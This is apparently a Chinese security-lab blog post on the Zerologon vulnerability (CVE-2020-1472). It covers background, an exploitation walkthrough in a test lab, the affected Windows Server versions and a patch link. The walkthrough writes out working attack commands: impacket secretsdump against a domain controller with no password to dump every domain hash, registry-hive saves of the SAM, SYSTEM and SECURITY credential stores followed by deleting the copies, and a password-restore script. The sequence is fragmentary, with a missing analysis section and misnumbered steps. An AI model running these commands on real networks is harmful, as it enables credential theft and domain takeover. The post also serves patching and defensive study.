声明
以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
0x01漏洞背景
NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。
0x02漏洞分析
0x03利用过程
漏洞测试环境:
攻击机:10.10.10.6
域控:10.10.10.1
1.2 使用impacket工具包 secretsdump工具dump导出域内所有用
hash python secretsdump.py hack.cn/DC$@10.10.10.1 -no-pass
reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.save
下载完成后进行删除操作
del system.savedel sam.savedel security.save
python secretsdump.py-sam sam.save-system system.save-security security.save LOCAL
1.6 通过导出的原NTLMhash恢复域控密码
python reinstall_original_pw.py DC 10.10.10.1 e9d755619bd2c460cd769560584c6d0b
0x04漏洞修复
漏洞影响范围:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-14720x05总结
CVE-2020-1472(Zerologon)是一个比较好用的域内提权漏洞,影响Windows sever的多个版本,只要攻击者能访问到目标并且知道目标计算机名即可,在内网中是一个非常严重的漏洞,攻击者在利用漏洞时还会存在使域控脱域的风险。未打补丁机器的需要尽快修补。
长白山攻防实验室
学习最新技术知识
